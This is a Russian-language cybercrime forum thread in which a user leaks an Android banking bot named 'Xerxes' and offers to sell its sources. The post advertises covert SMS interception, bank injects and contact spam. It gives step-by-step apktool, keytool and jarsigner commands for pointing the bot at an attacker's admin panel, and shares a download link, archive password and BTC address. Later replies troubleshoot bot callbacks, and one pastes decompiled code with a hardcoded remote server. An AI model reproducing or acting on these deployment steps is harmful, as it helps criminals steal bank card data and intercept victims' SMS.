malware Андроид бот xerxes

[crack]

Бот писался на заказ. Клиент слился.Что умеет. СМС перехват скрытно, автопуши банков и картона,ручной запуск пушей, отправка смс, запуск инжектов, работа инжектов на всех версиях андроида, инжекты хранит на телефоне холдера,скачка смс, спам по контактам, автокрипт бота,шифрование траффа и дохрена что еще все описывать не хочу.
Бот не работает по ру.Крипт апи описывать в админке не стал лень если что позже выложу инструкцию.Бот работает на всех версиях андроид, тестировался и на последних 8-9.Установка простая есть мануал, заливаем на хостинг, прописываем базу в конфиге, заливаем базу.Нужен крипт, с криптом % 70 ботов живут неделями. По картону на нормальном траффике % 10-12 примерно, траффик с гугла. Палит пока 1 ав.Надеюсь сэкономить n k$

Сборка бота:
Билд апк, ставим apktool
Распаковываем апк командой apktool d -f app.apk
Рекурсивно меняем адрес админки (http://localhost/), для любителей Windows ставим Notepad++ выбираем функцию заменить во всех файлах.
Если нужно сменить иконку идем в папку apk/app/res/mipmap-xxxhdpi и меняем иконку ic_launcher.png на нужную, название оставляем прежнее.
Название приложения можно сменить в манифесте
Все собираем билд apktool b app -o new_app.apk
Подписываем приложение командами
echo y | keytool -genkey -dname "CN=Unknown,O=Unknown,C=Unknown" -keystore mykeystore.keystore -keysize 1024 -alias b5a -validity 14000 -keypass 123456 -storepass 123456 -sigalg SHA1withDSA

jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore mykeystore.keystore new_app.apk b5a -keypass 123456 -storepass 123456
На этом вроде все!
Кто захочет отблагодарить BTC 1BgTjgmwXZaMYeCmDhhyYXzsbYv9bFcbpi
Если возникнут проблемы спрашивайте.
Линк
Пароль xerxes

 

[validator]

Пароль от архива?

 

[crack]

Пароль от архива?

xerxes =)

 

[maloynvis]

нужна помощь собрать apk. Apktool скачал, распаковал, заменил localhost на название своего домена во всех файлах разобранного приложения, все сохранил. Собрал билд командой apktool b app -o new_app.apk , при попытке подписать командой

echo y | keytool -genkey -dname "CN=Unknown,O=Unknown,C=Unknown" -keystore mykeystore.keystore -keysize 1024 -alias b5a -validity 14000 -keypass 123456 -storepass 123456 -sigalg SHA1withDSA

выдает
keytool error: java.lang.Exception: Key pair not generated, alias <b5a> already
exists
загуглил, оказывается ошибка keytool: java.lang.Exception: пара ключей не сгенерирована, псевдоним <b5a> уже существует
ладно...
далее ввожу

jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore mykeystore.keystore new_app.apk b5a -keypass 123456 -storepass 123456

на выходе
Please specify alias name

Please type jarsigner -help for usage
exists
но apk ставиться на телефон без проблем, хотя отстука нет, видимо из за того что была ошибка при подписи приложения...
ТС, прошу у вас помощи.

 

[crack]

нужна помощь собрать apk. Apktool скачал, распаковал, заменил localhost на название своего домена во всех файлах разобранного приложения, все сохранил. Собрал билд командой apktool b app -o new_app.apk , при попытке подписать командой

выдает
keytool error: java.lang.Exception: Key pair not generated, alias <b5a> already
exists
загуглил, оказывается ошибка keytool: java.lang.Exception: пара ключей не сгенерирована, псевдоним <b5a> уже существует
ладно...
далее ввожу

на выходе
Please specify alias name

Please type jarsigner -help for usage
exists
но apk ставиться на телефон без проблем, хотя отстука нет, видимо из за того что была ошибка при подписи приложения...
ТС, прошу у вас помощи.

Название домена + имя админ, http://localhost/adminpanel

 

[maloynvis]

Название домена + имя админ, http://localhost/adminpanel

С подписью apk разобрался, дело было в переменных окружения, и неправильном расположении файлов. Билд ставиться на ура, тут же предлагает ввести информацию по карте, и настойчиво просит включить Google Play.

Но отстука так и нет...
Я на хост в корневую папку "domain.com"выгружаю папку "xerxes", следовательно во всех .smali файлах в содержанием (всего нашел три таких файла в папке res, работал через Notepad++) нужно заменить выражение http://localhost/ на http://domain.com/xerxes/. Так?
PS: IP USA на телефоне и на PC

 

[2c71e9]

а где гарантия что файл не стучит в две админки? с чего вообще такая щедрость?)

 

[maloynvis]

И то что бот не работает по ру, это определяется только geoIP, или ещё какими то критериями? Языками системы например, языками ввода...

Пробовал менять и IP, язык системы на EN, удалял русскую раскладку, переустановил заново приложение, но отстука так и нет.
ТС помогайте))

 

[crack]

С подписью apk разобрался, дело было в переменных окружения, и неправильном расположении файлов. Билд ставиться на ура, тут же предлагает ввести информацию по карте, и настойчиво просит включить Google Play.

Но отстука так и нет...
Я на хост в корневую папку "domain.com"выгружаю папку "xerxes", следовательно во всех .smali файлах в содержанием (всего нашел три таких файла в папке res, работал через Notepad++) нужно заменить выражение http://localhost/ на http://domain.com/xerxes/. Так?
PS: IP USA на телефоне и на PC

ip значения не имеет, бот определяет по языку на телефоне и еще по ряду признаков, попробуйте с эмулятора там по дефолту обычно us

 

[crack]

а где гарантия что файл не стучит в две админки? с чего вообще такая щедрость?)

ботом больше не занимаюсь, ставьте снифер смотрите траффик

 

[2c71e9]

все равно не понятно, хочешь слить, сливай сорцы, зачем сливать просто апк. обкатываешь софт? все очень мутно.

U.P.D. поглядел сорцы, написано просто ужасно. юзается куча либ, есть внешние конекты к примеру на сервер. админка просто солянка какая-то. инжекты стянуты с других ботов, просто формат. не помню, мазар помоему

  public static final String ENGINE_IMPLEMENTATION = "Engine";
  public static final String NON_TLS_CONNECTION = "Non_TLS";
  private static CNetTLSProviderBase Net = null;
  private static String Pass = "123456";
  private static String Path = null;
  private static String ProtocolType = "Non_TLS";
  public static final String SOCKET_IMPLEMENTATION = "Socket";
  public static final String TAG = "CNET";
  public static final String TLS_PROTOCOL = "TLS";
  private static Thread Wait = null;
  private static KeySecureManager km = null;
  public static boolean localhost = false;
  private static String localhost_port = "127.0.0.1:7275";
  private static CNet network = null;
  public static String slphost_port = "208.8.164.7:7275";
  private static TrustSecureManager tm = null;

 

[crack]

все равно не понятно, хочешь слить, сливай сорцы, зачем сливать просто апк. обкатываешь софт? все очень мутно.

не хотите не юзайте,кому понравится бот могу продать и сорцы

 

[2c71e9]

не хотите не юзайте,кому понравится бот могу продать и сорцы

я и не собирюсь юзать, я разработчик. и я за качество. я бы такое и за 100 баксов не купил. не говоря уже про твой крипт. ты что все руками делал? что это такое kdfgsdlsdf по всем классам. это точно не рандом, так как юзается 3-4 буквы рядом стоящие ^_^

 

[crack]

я и не собирюсь юзать, я разработчик. и я за качество. я бы такое и за 100 баксов не купил. не говоря уже про твой крипт. ты что все руками делал? что это такое kdfgsdlsdf по всем классам. это точно не рандом, так как юзается 3-4 буквы рядом стоящие ^_^

ахаха ты даже не понимаешь что это просто мусорные классы, этот апк не криптованый апк,мой крипт использует декс, твой интерес тут продать свое, а я тут лишний для тебя, я более чем честно поступаю я даю людям бесплатно а там уже им решать если понравятся заберут исходники. Повидал я вас балаболов со своими супер ботами=)

 

[2c71e9]

Ну как бы я ни чего не продаю) совсем ни чего) так что про конкурентов ни чего не надо мне тут говорить. чуток позже декомпилирую погляжу логику и твои "мусорные классы". если он не криптованный что за странные имена классов у тебя?

А кстати за инжекты заебись решение, не спизжено и правда, но можно было сделать еще лучше. но идея крутая, так почти ни кто не делает.

 

[2c71e9]

код по админке случайно наткнулся на файл

гуглим.
https://stackoverflow.com/questions/4356289/php-random-string-generator
можно дальше погуглить я думаю. м?

структура проекта тоже шедевр, шаблон в каждом файле. как бы так уже давно ни кто не пишет.

 

[crack]

Ну как бы я ни чего не продаю) совсем ни чего) так что про конкурентов ни чего не надо мне тут говорить. чуток позже декомпилирую погляжу логику и твои "мусорные классы". если он не криптованный что за странные имена классов у тебя?
Посмотреть вложение 3317

набьешь постов начнешь предлогать, иначе не стал бы ты говно разводить, я выложил бесплатно ты орешь про (я разработчик. и я за качество) за качестно чего чужих ботов=) бро ты что то темнишь тут)))
Ладно можешь срать дальше мне то пофиг я поделился с народом кто заинтересован будет в исходниках пишите, как писал выше по тестам бот показал на гугл трафике 10+%

 

[2c71e9]

ой Господи и что будет если я постов набью? у меня счетчик увеличится? я тебе делаю конкретные замечания, предложения по софту. а ты переходишь на личности

по строкам еще есть вопрос, почему бы не завести одну переменную GATE а везде пишешь http://localhost и чтобы что-то изменить нужно бегать по всему коду.

 

[crack]

Адрес админки прописан в одном месте, статика, студия при сборки соберает и прописывает во все классах. Бро вместо того что бы искать пятна на трусах написал бы статью как нам дуракам код надо писать или интересное что.

 

[2c71e9]

не надо мне рассказывать, студия так не собирает, я тебе могу даже пример сделать, я собаку сьел на написании крипторов через декомпиляцию апк. это у тебя в коде статикой прописано